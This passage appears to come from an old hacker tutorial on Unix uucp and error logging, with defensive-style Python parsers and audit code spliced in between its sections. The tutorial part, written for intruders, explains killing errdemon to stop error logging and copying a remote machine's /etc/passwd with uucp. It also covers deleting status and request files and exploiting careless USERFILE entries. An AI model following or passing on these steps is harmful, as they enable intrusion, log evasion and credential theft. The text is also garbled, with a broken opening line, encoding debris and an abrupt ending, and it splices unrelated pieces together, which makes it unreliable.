1 -***<<<(((CRAAASSSHHH!!!)))>>>***-
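
Reading the configuration described above answers the question an administrator cares about: where do priority-5 (security) events end up, and who is told? As an added example, not part of the article, here is a Python parser for the "<priority><file> [users...]" form shown above, with two queries over it. The sample configuration is constructed; the file names in it are illustrative.

```python
import re

# Constructed sample in the "<priority><file> [users...]" form the text describes.
SAMPLE_SYSLOG_CONFIG = """\
9/usr/adm/debuglog
6/usr/adm/errlog
5/usr/adm/seclog root operator
3/dev/console
"""

ENTRY = re.compile(r"^\s*(\d)(\S+)\s*(.*)$")


def parse_syslog_config(text):
    """Return one dict per entry: priority (1 = most urgent, 9 = least),
    destination file, and the optional list of users to notify."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = ENTRY.match(line)
        if not m:
            raise ValueError("line %d: not a <priority><file> entry" % lineno)
        prio, target, users = m.groups()
        entries.append({"priority": int(prio), "file": target, "users": users.split()})
    return entries


def destinations_for(entries, priority):
    """Every (file, users) pair that receives an event of the given priority.
    An entry with number N collects events of priority N or higher, and
    "higher" in this scheme means a smaller number."""
    return [(e["file"], e["users"]) for e in entries if priority <= e["priority"]]


def console_alert_threshold(entries):
    """Least urgent priority number that is still echoed to /dev/console, or None."""
    levels = [e["priority"] for e in entries if e["file"] == "/dev/console"]
    return max(levels) if levels else None
```

With the sample, a priority-5 event lands in three files and is announced to root and operator, while anything at priority 3 or more urgent also reaches the console. If `destinations_for(entries, 5)` returns nothing, failed logins and su attempts are being discarded, which is the configuration an intruder hopes for.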

SYSTEM V ERROR LOGGING
----------------------
	System V error logging is relatively simple compared to Berkeley Unix error logging. The System V error logging program is errdemon. To find the process id of the error logging program, type "ps -uroot". This will give you a list of all the processes run under the root id. You will find /etc/errdemon somewhere in the list. Kill the process, and no more error logging. The errdemon program is not as sophisticated as BSD Unix's syslog program: it only logs all errors into a file (the default file is /usr/adm/errfile, but another file can be specified as an argument to the program when it is started). Errdemon does not analyze the errors as syslog does; it simply takes them from a special device file called /dev/error and dumps them into the error logging file. If you wish to examine the error report, use the errpt program, which creates a report of the errors in the error logging file and prints it out on the standard output. The format is: errpt [option] [error logging file]. For a complete report of all errors, use the -a option:

errpt -a /usr/adm/errfile

The output is very technical, however, and not of much use to the hacker.

UUCP NETWORKING
---------------
	This section will cover the workings and use of the Unix uucp facilities. UUCP stands for Unix to Unix Copy. The uucp utilities are for the exchange of files between Unix systems. There are also facilities for users to dial out and interact with remote systems, and for executing limited commands on remote systems without logging in.

OUTWARD DIALING
---------------
	The command for outward dialing is cu. The format is:

cu -n[phone number]

Such as:

cu -n13125285020

On earlier versions of Unix, the format was simply "cu [phone number]".

Note that the format of the phone number may be different from system to system: for instance, a system that dials outward off of a pbx may need to have the number prefixed by a 9, and one that uses an extender may not need to have the number (if long distance) preceded by a 1. To dial out, however, the system must have facilities for dialing out. The file /usr/lib/uucp/Devices (called L-devices on earlier systems) will contain a list of the available dialout devices. Entries in this file are in the format:

[device type] [device name] [dial device] [linespeed] [protocol, optional]

Device type is one of 2 types: ACU and DIR. If ACU, it is a dialout device. DIR is a direct connection to a specific system. Device name is the base name of the dialout device's device file, which is located in the /dev directory. Dial device is usually an unused field. It was used on older systems where one device (device name in the above example) was used to exchange data, and another device (dial device, above) did the telephone dialing. In the age of the autodial modem, this is a rarely used feature. The next, linespeed, is the baud rate of the device, usually either 300, 1200, or 2400, possibly 4800 or 9600 if the device is a direct connection. The protocol field is for specifying the communications protocol. This field is optional and generally not used. Here is an example entry for a dialout device and a direct connection:

ACU tty99 unused 1200
DIR tty03 unused 9600

If a dialout device is capable of more than one baud rate, it must have 2 entries in the Devices (L-devices) file, one for each baud rate. Note that the device in the above example is a tty: usually, dialout device names will be in the form tty##, as they can be used both for dialing out and receiving incoming calls. The device can be named anything, however.

There are several options worth mentioning to cu:
-s Allows you to specify the baud rate. There must be a device in the Devices file with this speed.
-l Allows you to specify which device you wish to use.

If you wish to connect to a system that there is a direct connection with, simply type "cu -l[device]". This will connect you to it. You can also do that to connect directly to a dialout device, from which point, if you know what commands it accepts, you can give it the dial commands directly.

Using the cu command is basically the same as using a terminal program. When you use it to connect to a system, you then interact with that system as if you dialed it directly from a terminal. Like any good terminal program, the cu "terminal program" provides facilities for file transfers, and other commands. Here is a summary of the commands:

~.          -Disconnect from the remote system.

~!          -Temporarily execute a shell on the local system. When you wish to return to the remote system, press control-D.

~![cmd]     -Execute a command on the local system. Example: ~!ls -a

~$[cmd]     -Execute a command on the local system and send the output to the remote system.

~%put f1 f2 -Sends a file to the remote system. F1 is the name of the file on the local system, and f2 is the name to be given the copy made on the remote system.

~take f1 f2 -Copies a file from the remote to the local system. F1 is the name of the remote file, and f2 is the name to be given to the local copy.

Note that the commands for transferring output and files will only work if you are communicating with another Unix system.
	You may be wondering how you can find out the format for the phone number, which is necessary to dial out. The format can be obtained from the file /usr/lib/uucp/Systems (called L.sys on earlier Unix systems). This file contains the uucp network names and phone numbers of other Unix systems, as well as other information about them. This file contains the information needed to carry out uucp file transfers with the systems listed within it. The entries are in the format:

[system name] [times] [devicename] [linespeed] [phone number] [login info]

System name is the name of the system.
Times is a list of the times when the system can be contacted. This field will usually just have the entry "Any", which means that the system can be contacted at any time. Never means that the system can never be called. You can also specify specific days and times when the system can be contacted. The days are abbreviated like this:
Su Mo Tu We Th Fr Sa
Where Su is Sunday, Mo is Monday, etc. If the system can be called on more than one day of the week, you can string the days together like this: SuMoTu for Sunday, Monday, and Tuesday. You can also specify a range of hours when the system can be called, in the 24 hour format, like this: Su,0000-0100 means that the system can be called Sunday from midnight to 1am. The week days (Monday through Friday) can be abbreviated as Wk.
Device name is the name of the device to call the system with. If the system is directly connected, this field will contain the base name of the device file of the device which connects it to the local system. If the system has to be dialed over the phone, this field will be "ACU".
Linespeed is the baud rate needed to connect to the system. There must be a device available with the specified baud rate to contact the system.
Phone number is the phone number of the system. By looking at these entries, you can obtain the format for the phone number. For instance, if this field contained "913125285020" for an entry, you would know that the format would be 9+1+area code+prefix+suffix.
The login field contains information used for uucp transfers, and will be discussed in detail later.
	Sometimes you will see alphabetic or other strange characters in the phone number field. Sometimes, these may be commands for the particular brand of modem that the system is using to dial out, but other times, these may actually be a part of the phone number. If so, the meaning of these characters, called tokens, can be found in the file /usr/lib/uucp/Dialcodes (called L-dialcodes on earlier systems). Entries in this file are in the form:

token translation

For example:

chicago 312

Would mean that the token chicago means to dial 312. So, if the phone number field of a Systems entry was:

chicago5285020

It would mean to dial 3125285020.

You can add an entry to the Systems file for systems that you wish to call frequently. Simply edit the file using one of the Unix system's editors, and add an entry like this:

ripco Any ACU 1200 13125285020 unused

And then any time you wished to call the BBS Ripco, you would type:

cu ripco

And the system would do the dialing for you, drawing the phone number from the entry for Ripco in the Systems file.
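
An administrator reviewing who a machine will call, when, and at what number has to read Systems and Dialcodes together, and the times field has several shapes. As an added example that is not part of the article, here is a Python parser for both files as the text describes them, a Dialcodes token expansion, and an evaluator for the times field (Any, Never, day codes, Wk, and an hour range that may wrap past midnight). The sample files are constructed; "ripco" and the Chicago number come from the text, the other entries are illustrative.

```python
import datetime
import re

# Constructed Systems and Dialcodes content in the formats the text gives.
SAMPLE_DIALCODES = """\
chicago 312
"""
SAMPLE_SYSTEMS = """\
ripco Any ACU 1200 13125285020 unused
archive Never DIR 9600 - unused
nightbox SuMoTu,0000-0100 ACU 1200 chicago5285020 unused
office Wk,1800-0800 tty03 9600 - unused
"""

DAY_CODES = {"Mo": 0, "Tu": 1, "We": 2, "Th": 3, "Fr": 4, "Sa": 5, "Su": 6}  # datetime.weekday()


def parse_dialcodes(text):
    """Map each token to the digits it stands for."""
    codes = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            codes[parts[0]] = parts[1]
    return codes


def parse_systems(text):
    """One dict per Systems entry; everything after the phone number is the login field."""
    systems = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        name, times, device, speed, phone = parts[:5]
        systems.append({"name": name, "times": times, "device": device,
                        "speed": int(speed), "phone": phone,
                        "login": parts[5] if len(parts) > 5 else ""})
    return systems


def resolve_phone(phone, dialcodes):
    """Replace a leading alphabetic token by its Dialcodes translation."""
    m = re.match(r"^([A-Za-z]+)(.*)$", phone)
    if m and m.group(1) in dialcodes:
        return dialcodes[m.group(1)] + m.group(2)
    return phone


def callable_at(times, when):
    """Evaluate a Systems times field at `when` (a datetime or "YYYY-MM-DD HH:MM")."""
    if isinstance(when, str):
        when = datetime.datetime.strptime(when, "%Y-%m-%d %H:%M")
    if times == "Any":
        return True
    if times == "Never":
        return False
    day_part, _, hours = times.partition(",")
    if day_part == "Wk":
        days = set(range(5))
    elif day_part == "Any":
        days = set(range(7))
    else:
        days = {DAY_CODES[day_part[i:i + 2]] for i in range(0, len(day_part), 2)}
    if when.weekday() not in days:
        return False
    if not hours:
        return True
    start, end = (int(x) for x in hours.split("-"))
    hhmm = when.hour * 100 + when.minute
    if start <= end:
        return start <= hhmm < end
    return hhmm >= start or hhmm < end   # window wraps past midnight
```

Two things the parser makes visible that a glance at the file does not: the number actually dialled for "nightbox" is 3125285020 once the token is expanded, and "office" is reachable on a Monday at 23:00 but not at noon, because its window runs overnight.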

HOW UUCP TRANSFERS WORK
-----------------------
	This section will detail how a uucp file transfer works. When you issue the command to transfer a file to/from a remote system, the local system dials out to the remote system. Then, using the information contained in the login field of the Systems file, it logs into an account on the remote system, in exactly the same manner as you would log into a Unix system. Usually, however, uucp accounts use a special shell, called uucico, which implements certain security features which (are supposed to) keep the uucp account from being used for any other purpose than file transfers with another Unix system. (Note: not ALL uucp accounts will use this shell.) If you've ever logged into the uucp account on the system and received the message, "Shere=[system name]", and the system wouldn't respond to any of your input, that account was using the uucico shell, which prevents the account from being used as a normal "user" account. The local system then requests the transfer, and if security features of the remote system which will be discussed later do not prevent the transfer, the file will be copied to (or from, if you requested to send a file) the local system. The account is then logged off of the remote system, and the connection is dropped.

ADDING A LOGIN FIELD TO A SYSTEMS ENTRY
--------------------------------------
	Many superusers feel that if the uucp account uses the uucico shell, that it is "secure". Because of this, they may ignore other uucp security measures, and probably not give the account a password. If you find such a system, you can add an entry for the system to the Systems (L.sys) file of another Unix system and try to, say, transfer a copy of its password file. To do so, simply follow the outline in the section on cu for how to add an entry to the Systems file. That will cover everything but how to add the login field, which is covered in this section.
	The login section consists of expect/send subfields. For example, here is an example login field:

ogin: uucp assword: uucp

The first subfield is what is expected from the remote system, in this case "ogin:". This means to expect the login prompt, "Login:". Note that you do not have to enter the complete text that the remote system sends; the text sent from the remote system is scanned left to right as it is sent until the expected text is found. The second subfield contains the local system's response, which is sent to the remote system. In this case, the local system sends "uucp" when it receives the login prompt. Next, the local system scans the output from the remote system until it receives "assword:" ("password:"), then sends "uucp" (the password, in this example, for the uucp account). Because of line noise or other interference, when the local system connects to the remote, it may not receive the expected string. For this possibility, you may specify the expected string several times, like this:

ogin:-ogin: uucp assword:-assword: uucp

The - means that if the expected string is not received, expect the string specified after the hyphen. Sometimes, you may need to send a special character, such as kill or newline, to the system if the expected string is not received. You can do that like this:

ogin:-BREAK-ogin: uucp assword: uucp

The -BREAK- means that if ogin: isn't received the first time, to send a break signal to the remote system, and then expect ogin: again. Other common entries are:

ogin:-@-ogin:     Send a kill character if the expected string isn't received the first time.
ogin:-EOT-ogin:   Send a control-D if the expected string isn't received.
ogin:--ogin:      Send a null character if the expected string isn't received.

If the system you wish to transfer files with doesn't send anything when you first connect to it (say, you have to press return first), the first expect entry should be "" (nothing), and the first send field should be \r (a return character). There are certain characters, like return, which are represented by certain symbols or combinations of characters. Here is a list of these:

\r -Return.
@  -Kill.
-  -Null/newline character.
"" -Nothing.

UNUSUAL LOGIN ENTRIES
---------------------
	Sometimes, the login entry for a system might contain more than just fields to expect the login prompt, send the username, expect the password prompt, and send the password. For instance, if you have to go through a multiplexer to get to the system, the login field would contain a subfield to select the proper system from the multiplexer.
	Sometimes, on systems that use the Hayes smartmodem to dial out, the phone number field may be left unused (will contain an arbitrary entry, such as the word "UNUSED"), and the dialing command will be contained in the login field. For example:

ripco Any ACU 1200 UNUSED "" ATDT13125285020 CONNECT \r ernumber: new

So, when you try to transfer a file with a Unix system called "ripco": "UNUSED" is sent to the Hayes smartmodem. Of course, this is not a valid Hayes command, so it is ignored by the modem. Next, the system moves to the login field. The first expect subfield is "", which means to expect nothing. It then sends the string "ATDT13125285020", which is a Hayes dialing command, which will make the modem dial 13125285020. When the string "CONNECT" is received (which is what the smartmodem will respond with when it connects), the system sends a carriage return and waits for the "Usernumber:" prompt. When it receives that, it sends "new". This completes the login.
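
The expect/send rules of the previous two sections are easier to verify with a small interpreter than by eye, and a model of them also shows what a login field discloses to anyone who can read the Systems file (the account name, the password, and the exact dialogue). The following is an added example, not part of the article and not uucico's real parser: a Python parser that follows the semantics the text gives (hyphen-separated alternatives, where BREAK, EOT, @ and an empty subfield are sends and anything else is a renewed expect), plus a simulator that replays a parsed script against a constructed remote transcript. The three login fields are the ones quoted above.

```python
# Constructed login fields, taken from the forms shown in the text.
SIMPLE_LOGIN = "ogin:-ogin: uucp assword:-assword: uucp"
BREAK_LOGIN = "ogin:-BREAK-ogin: uucp assword: uucp"
HAYES_LOGIN = '"" ATDT13125285020 CONNECT \\r ernumber: new'

# Subfields between hyphens that are sends rather than expects, per the text.
SPECIAL_SENDS = {"BREAK": "<break>", "EOT": "\x04", "@": "<kill>", "": "\0"}


def parse_expect_send(field):
    """Split a login field into steps of {expect, retries, send}. retries is a
    list of (fallback_send, expect_again) pairs; fallback_send is None when the
    field simply expects the string again without sending anything."""
    tokens = field.split()
    if len(tokens) % 2:
        raise ValueError("login field needs expect/send pairs")
    steps = []
    for i in range(0, len(tokens), 2):
        parts = tokens[i].split("-")
        expect, retries, pending = parts[0], [], None
        for part in parts[1:]:
            if part in SPECIAL_SENDS:
                pending = SPECIAL_SENDS[part]
            else:
                retries.append((pending, part))
                pending = None
        if pending is not None:            # trailing send with no renewed expect
            retries.append((pending, expect))
        steps.append({"expect": "" if expect == '""' else expect,
                      "retries": retries,
                      "send": tokens[i + 1].replace("\\r", "\r")})
    return steps


def simulate(steps, transcript):
    """Replay `steps` against `transcript`, a constructed list of strings the
    remote emits, one per expect attempt. Returns everything the local side
    would send, or raises RuntimeError when an expect is never satisfied."""
    sent, pos = [], 0
    for step in steps:
        attempts = [(None, step["expect"])] + step["retries"]
        satisfied = False
        for fallback, want in attempts:
            if fallback is not None:
                sent.append(fallback)
            if want == "":                 # "" means expect nothing: send at once
                satisfied = True
                break
            chunk = transcript[pos] if pos < len(transcript) else ""
            pos += 1
            if want in chunk:
                satisfied = True
                break
        if not satisfied:
            raise RuntimeError("expected %r, never received" % step["expect"])
        sent.append(step["send"])
    return sent
```

Replaying BREAK_LOGIN against a remote that first emits noise and then "Login:" shows the BREAK going out before the account name; the Hayes field sends the dial string with no expect, waits for CONNECT, and only then starts the real login. Because the password sits in the file in clear text, the Systems file should be readable by the uucp owner only.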

UUCP SYNTAX
-----------
	Once you've completed an entry for the Unix system you wish to transfer files with, you can issue the uucp command, and attempt the transfer. The syntax to copy a file from the remote system is:

uucp remote![file pathname] [local pathname]

Where remote is the name of the system you wish to copy the file from, [file pathname] is the pathname of the file you wish to copy, and [local pathname] is the pathname of the file on the local system that you wish to name the copy that is made on the local system.
To transfer a file from the local system to the remote system, the syntax is:

uucp [local pathname] remote![file pathname]

Where [local pathname] is the file on the local system that you wish to transfer to the remote system, remote is the name of the remote system, and [file pathname] is the pathname you wish to give to the copy to be made on the remote system.

So, to copy the ripco system's password file, type:

uucp ripco!/etc/passwd /usr/spool/uucppublic/ripcofile

Which will, hopefully, copy the password file from ripco into a file on the local system called /usr/spool/uucppublic/ripcofile. The directory /usr/spool/uucppublic is a directory set up especially for the reception of uucp-transferred files, although you can have the file copied to any directory (if the directory permissions don't prevent it).

DEBUGGING UUCP PROCEDURES
-------------------------
	So, what if your transfer did not go through? Well, this section will detail how to find out what went wrong, and how to correct the situation.

UULOG
-----
	The uulog command is used to draw up a log of transactions with remote systems. You can either draw up the entries by system name, or the name of the user who initiated the transaction.
For our purposes, we only want to draw up the log by system name. The format is:

uulog -s[system name]

Now, this will pull up the logs for ALL transactions with this particular system. We only want the logs for the last attempted transaction with the system. Unfortunately, this can't be done; you'll just have to sort through the logs until you reach the sequence of the last transaction. If the logs extend back a long time, say about a week, however, you can use the grep command to call up the logs only for a certain date:

uulog -s[system] | grep mm/dd-

Where mm is the month (in the form ##, such as 12 or 01) and dd is the day, in the same form. This takes the output of the uulog command, and searches through it with the grep command and only prints out those entries which contain the date the grep command is searching for. The log entries will be in the form:

[username] [system] (month/day-hour:minute-pid) DESCRIPTION

Where:

username    -Is the userid of the account that initiated the transaction.
system      -Is the name of the system that the transaction was attempted with.
month/day   -Date of transaction.
hour:minute -Time of transaction.
job number  -The transfer's process id.
DESCRIPTION -The log message.

An example of a typical log entry:

root ripco (11/20-2:00-1234) SUCCEEDED (call to ripco)

In the above example, the root account initiated a transaction with the Ripco system. The system was contacted on November 20, at 2:00. The job number of the transaction is 1234.

Here is an explanation of the various log messages you will encounter, and their causes:

1. SUCCEEDED (call to [system name])

The system was successfully contacted.

2. DIAL FAILED (call to [system name])

Uucp failed to contact the system. The phone number entry for the system in the Systems file may be wrong, or in the wrong format.

3. OK (startup)

Conversation with the remote system has been initiated.

4. LOGIN FAILED

Uucp was unable to log into the remote system. There may be an error in the login field in the entry for the remote system in the Systems file, or line noise may have caused the login to fail.

5. WRONG SYSTEM NAME

The system's entry in the Systems file has the wrong name for the system at the phone number specified in the entry.

6. REMOTE DOES NOT KNOW ME

The remote system does not recognize the name of the local system, and will not perform transactions with an unknown system (some will, some won't... see the section on uucp security).

7. REQUEST ([remote file] --> [local file] username)

The file transfer has been requested.

8. OK (conversation complete)

The transfer has been completed.

9. ACCESS DENIED

Security measures prevented the file transfers. If you get this error, you will receive mail on the local system informing you that the transfer was denied by the remote.

10. DEVICE LOCKED

All the dialout devices were currently in use.

A successful transaction log will usually look like this:

root ripco (11/20-2:00-1234) SUCCEEDED (call to ripco)
root ripco (11/20-2:01-1234) OK (startup)
root ripco (11/20-2:01-1234) REQUEST (ripco!/etc/passwd --> /ripcofile root)
root ripco (11/20-2:03-1234) OK (conversation complete)
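
The text says the log of the last transaction cannot be pulled out directly; it can, once the lines are parsed, because the job number groups them. The same parse answers the question the administrator on the other end asks: which remote systems requested which files. As an added example that is not part of the article, here is a Python parser for the log format shown above, a summary of the most recent job per system, and a search for REQUEST lines naming a given path. The log excerpt is constructed; its first four lines are the successful transaction above, the rest show a failed attempt to a second, illustrative system.

```python
import re

# Constructed uulog excerpt in the form the text gives.
SAMPLE_UULOG = """\
root ripco (11/20-2:00-1234) SUCCEEDED (call to ripco)
root ripco (11/20-2:01-1234) OK (startup)
root ripco (11/20-2:01-1234) REQUEST (ripco!/etc/passwd --> /ripcofile root)
root ripco (11/20-2:03-1234) OK (conversation complete)
uucp archive (11/21-3:00-1300) DIAL FAILED (call to archive)
uucp archive (11/21-4:00-1301) SUCCEEDED (call to archive)
uucp archive (11/21-4:00-1301) OK (startup)
uucp archive (11/21-4:01-1301) ACCESS DENIED
"""

LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+\((\d\d/\d\d)-(\d{1,2}:\d\d)-(\d+)\)\s+(.*)$")
FAILURES = ("DIAL FAILED", "LOGIN FAILED", "WRONG SYSTEM NAME",
            "REMOTE DOES NOT KNOW ME", "ACCESS DENIED", "DEVICE LOCKED")


def parse_uulog(text):
    """One dict per log line: user, system, date, time, job, message."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            raise ValueError("line %d does not match the uulog format" % lineno)
        user, system, date, clock, job, message = m.groups()
        entries.append({"user": user, "system": system, "date": date,
                        "time": clock, "job": job, "message": message})
    return entries


def last_job(entries, system):
    """Entries belonging to the most recent job for `system`. The log is
    appended in order, so the job number seen last is the newest."""
    jobs = [e["job"] for e in entries if e["system"] == system]
    if not jobs:
        return []
    latest = jobs[-1]
    return [e for e in entries if e["system"] == system and e["job"] == latest]


def outcome(entries, system):
    """Summarize the last job as ("ok" | "incomplete", requests) or ("failed", reason)."""
    job = last_job(entries, system)
    if not job:
        return ("unknown", "no entries for %s" % system)
    for e in job:
        for reason in FAILURES:
            if e["message"].startswith(reason):
                return ("failed", reason)
    requests = [e["message"] for e in job if e["message"].startswith("REQUEST")]
    complete = any(e["message"].startswith("OK (conversation complete)") for e in job)
    return ("ok" if complete else "incomplete", requests)


def transfers_of(entries, path):
    """Every REQUEST naming `path`: (user, system, date, time) tuples."""
    return [(e["user"], e["system"], e["date"], e["time"]) for e in entries
            if e["message"].startswith("REQUEST") and path in e["message"]]
```

For the sample, `outcome(entries, "ripco")` reports the completed job and its one request, `outcome(entries, "archive")` reports ACCESS DENIED, and `transfers_of(entries, "/etc/passwd")` is the line a remote administrator would want to see when reviewing who pulled the password file.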

	When an error occurs during a transfer with a system, a status file is created for that system, and remains for a set period of time, usually about an hour. During this time, that system cannot be contacted. These files, depending on which version of Unix you are on, will either be in the directory /usr/spool/uucp, and have the form:
STST..[system name]
or will be in the directory /usr/spool/uucp/.Status, and have the same name as the system. These status files will contain the reason that the last transfer attempt with the system failed. These files are periodically purged, and if you wish to contact the system before its status file is purged, you must delete its status file.
The files containing the failed transfer request will also remain. If you are using the latest version of System V, these files will be in a subdirectory of the directory /usr/spool/uucp. For instance, if the system is called ripco, the files will be in the directory /usr/spool/uucp/ripco. On other systems, these files will be in the directory /usr/spool/uucp/C., or /usr/spool/uucp. These files are in the form:

C.[system name]AAAAAAA

Where [system name] is the name of the system to be contacted, and AAAAAAA is the transfer's uucp job number. (You can see the transfer request's job number by specifying the j option when you initiate the transfer. For example, "uucp -j ripco!/etc/passwd /usr/spool/uucppublic/ripcofile" would initiate the transfer of the ripco system's password file, and display the job number on your screen.) Type "cat C.system[jobnumber]", and you will see something like this:

R /etc/passwd /usr/pub/.dopeypasswd root -dc dummy 777 guest

On earlier versions of Unix, these files will be in the directory /usr/spool/uucp/C. To find the file containing your transfer, display the contents of the files until you find the proper one. If your transfer fails, delete the transfer request file and the status file, correct any errors in the Systems file or whatever, and try again!

UUCP SECURITY
-------------
=09Obviously, uucp access to files has to be restricted. Otherwise,=
=20
anyone, from any system, could copy any file from the remote system. =
This=20
section will cover the security features of the uucp facilities.
=09The file /usr/lib/uucp/USERFILE contains a list of the directories=
that=20
remote systems can copy from, and local users can send files from to =
remote=20
systems. The entries in this file are in the format:

[local user],[system] [callback?] [directories]

Where:

local user  - Is the username of a local account. This is for the purpose
              of restricting which directories a local user can send files
              from to a remote system.
system      - Is the name of a remote system. This is for the purpose of
              restricting which directories a specific remote system can
              copy files from.
callback?   - If there is a c in this field, then if a transfer request is
              received from the system indicated in the system field, then
              the local system (in this case, the local system is the system
              which receives the transfer request, rather than the system
              that initiated it) will hang up and call the remote back (at
              the number indicated in the remote's entry in the local's
              Systems file) before starting the transfer.
directories - Is a list of the pathnames of the directories that the remote
              system indicated in the system field can copy files from, or
              the local user indicated in the local user field can send files
              from to a remote system.

A typical entry might look like:

local_dork,ripco - /usr/spool/uucppublic

This means that the user local_dork can only send files to a remote system
which are in the directory /usr/spool/uucppublic, and the remote system ripco
can only copy files from the local system that are in the directory
/usr/spool/uucppublic. This is typical: often, remotes are only allowed to copy
files in that directory, and if they wish to copy a file from another portion
of the system, they must notify a user on the system to move that file to the
uucppublic directory. When a transfer request is received from a remote system,
the local system scans through the USERFILE, ignoring the local user field (you
can't restrict transfers with a particular user from a remote system...the copy
access granted to a system in the USERFILE is granted to all users from that
system), until it finds the entry for that system, and if the system is allowed
to copy to or from that directory, the transfer is allowed, otherwise it is
refused. If an entry for that system is not found, the USERFILE is scanned
until an entry with a null system name (in other words, an entry with no system
name specified) is found, and the directory permissions for that entry are
used. If no entry is found with a null system name, the transfer is denied.

There are a few quirks about USERFILE entries. First, if you have copy access
to a directory, you also have copy access to any directories below it in the
system tree. Thus, lazy system operators, rather than carefully limiting a
system's access to only the directories it needs access to, often just give
them copy access to the root directory, thus giving them copy access to the
entire system tree. Yet another mistake made by careless superusers is leaving
the system name field empty in the entries for the local users. Thus, if a
system that doesn't have an entry in the USERFILE requests a transfer with the
local system, when the USERFILE is scanned for an entry with a null system
name, if the entries for the local users come first in the USERFILE, the system
will use the first entry for a local user it finds, since it has a null system
name in the system name field. Note that none of these security features even
works if the uucp account on the system the transfer is requested with does not
use the uucico shell. In any case, whether the account uses the uucico shell or
not, even if you have copy access to a directory, individual file or directory
protections may prevent the copying. For information on uucp security in yet
another version of the uucp facilities, see the piece on the Permissions file
in the section on uux security.
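
The USERFILE scan and the two misconfigurations just described, as an added example (not from the article): the file contents, the lookup emulation and the audit function are constructed here; "ripco" and "local_dork" are the article's sample names.

```python
# Added example (not from the article): emulate the USERFILE lookup described
# above and audit a file for the two mistakes the text warns about. The file
# below is constructed for illustration; "ripco" is the article's sample name.
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class UserfileEntry:
    local_user: str          # "" when the local user field is empty
    system: str              # "" is a null system name
    callback: bool           # "c" in the callback field
    directories: List[str] = field(default_factory=list)


def parse_userfile(text: str) -> List[UserfileEntry]:
    """Parse lines of the form: [local user],[system] [callback?] [directories]"""
    entries = []
    for raw in text.splitlines():
        fields = raw.split()
        if not fields:
            continue
        # the first field is "user,system"; either side may be empty
        user, _, system = fields[0].partition(",")
        callback = len(fields) > 1 and fields[1] == "c"
        entries.append(UserfileEntry(user, system, callback, fields[2:]))
    return entries


def _under(path: str, directory: str) -> bool:
    """Copy access to a directory covers every directory below it in the tree."""
    d = directory.rstrip("/") or "/"
    return d == "/" or path == d or path.startswith(d + "/")


def remote_may_copy(entries: List[UserfileEntry], system: str,
                    path: str) -> Optional[UserfileEntry]:
    """Decide an incoming request from `system` for `path`.

    Exactly as the text describes: the local user field is ignored, the
    first entry naming the system decides; if no entry names it, the first
    entry with a null system name decides; if there is none, deny.
    Returns the entry that granted access, or None when refused.
    """
    chosen = next((e for e in entries if e.system == system), None)
    if chosen is None:
        chosen = next((e for e in entries if e.system == ""), None)
    if chosen is None:
        return None
    return chosen if any(_under(path, d) for d in chosen.directories) else None


def audit_userfile(entries: List[UserfileEntry]) -> List[str]:
    """Flag entries that grant the whole tree, and local-user entries whose
    empty system field turns them into a catch-all for unknown remotes."""
    findings = []
    for i, e in enumerate(entries):
        if any(d.rstrip("/") == "" for d in e.directories):
            findings.append(f"entry {i}: copy access to / covers the entire system tree")
        if e.local_user and not e.system:
            findings.append(f"entry {i}: local user {e.local_user!r} has a null system "
                            "name and will match any remote not listed elsewhere")
    return findings


# Constructed sample: the article's typical entry, a careless entry for a local
# user with the system field left empty (and / as its directory), and the
# intended catch-all for unknown remotes, which comes too late to matter.
SAMPLE_USERFILE = """\
local_dork,ripco - /usr/spool/uucppublic
joe, - /
, - /usr/spool/uucppublic
"""

if __name__ == "__main__":
    entries = parse_userfile(SAMPLE_USERFILE)
    for system, path in [("ripco", "/usr/spool/uucppublic/ripcofile"),
                         ("ripco", "/etc/passwd"),
                         ("unknown", "/etc/passwd")]:
        granted = remote_may_copy(entries, system, path)
        print(f"{system:8} {path:36} -> {'allowed' if granted else 'refused'}")
    for finding in audit_userfile(entries):
        print("audit:", finding)
```

Moving joe's entry below the catch-all, or giving it a system name, makes the unknown remote's request for /etc/passwd fall through to the uucppublic-only entry and be refused.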

EXECUTING COMMANDS ON A REMOTE SYSTEM
-------------------------------------
        There are 2 commands for executing commands on a remote system- uux and
rsh (remote shell- this has nothing to do with the rsh shell [restricted Bourne
shell]). This section will cover the uses of both.

UUX
---
        The uux command is one of the uucp utilities. This is used, not for
file transfers, but for executing non-interactive commands on a remote system.
By non-interactive, I mean commands that don't request input from the user, but
are executed immediately when issued, such as rm and cp. The format is:

uux remote!command line

Where remote is the name of the remote system to perform the command on, and
the rest (command line) is the command to be performed, and any arguments to
the command. You will not receive any of the command's output, so this command
can't be used for, say, printing the contents of a text file to your screen.

UUX SECURITY
------------
        If the uucp account on the remote system uses the uucico shell, then
these security features apply to it.

        The file /usr/lib/uucp/Commands contains a list of the commands a
remote system can execute on the system. By remote system, in this case, I mean
the system that the user who initiates the uux command is on, and local system
will mean the system that receives the uux request. Entries in the file
/usr/lib/uucp/Commands are in the following format:

PATH=[pathname]
command
command
" to infinity...
command,system

The first line, PATH=[pathname], sets the searchpath for the remote system
requesting the uux execution of a command on the local system. This entry is
just the same as, say, a line in a login file that sets the searchpath for a
regular account, example: PATH=/bin:/usr/bin
Which sets the searchpath to search first the directory /bin, and then the
directory /usr/bin when a command is issued. The following entries are the base
names of the programs/commands that the remote can execute on the local system.
The last program/command in this list is followed by a comma and the name of
the remote site. For example:

PATH=/bin
rmail
lp,ripco

Means that the remote system Ripco can execute the rmail and lp commands on the
local system. Usually, only the lp and rmail commands will be allowed.
        Again, we come to another, "different" version of the uucp facilities.
On some systems, the commands a remote system can execute on the local system
are contained in the file /usr/lib/uucp/Permissions. Entries in this file are
in the form:

MACHINE=[remote] COMMANDS=[commands] REQUEST=[yes/no] SEND=[yes/no]
READ=[directories] WRITE=[directories]

Where:

Remote is the name of the remote system. Commands is a list of the commands
the remote may execute on the local system, in the form:

pathname:pathname

For example:

/bin/rmail:/usr/bin/netnews

The yes (or no) after "REQUEST=" tells whether or not the remote can copy
files from the local system. The yes/no after "SEND=" tells whether or not the
remote system can send files to the local system. The list of directories after
"READ=" tells which directories the remote can copy files from (provided that
it has REQUEST privileges), and is in the form:

pathname:pathname...etc.

For example:

/usr/spool/uucppublic:/usr/lib/uucp

Again, as before, the remote has copy access to any directories that are below
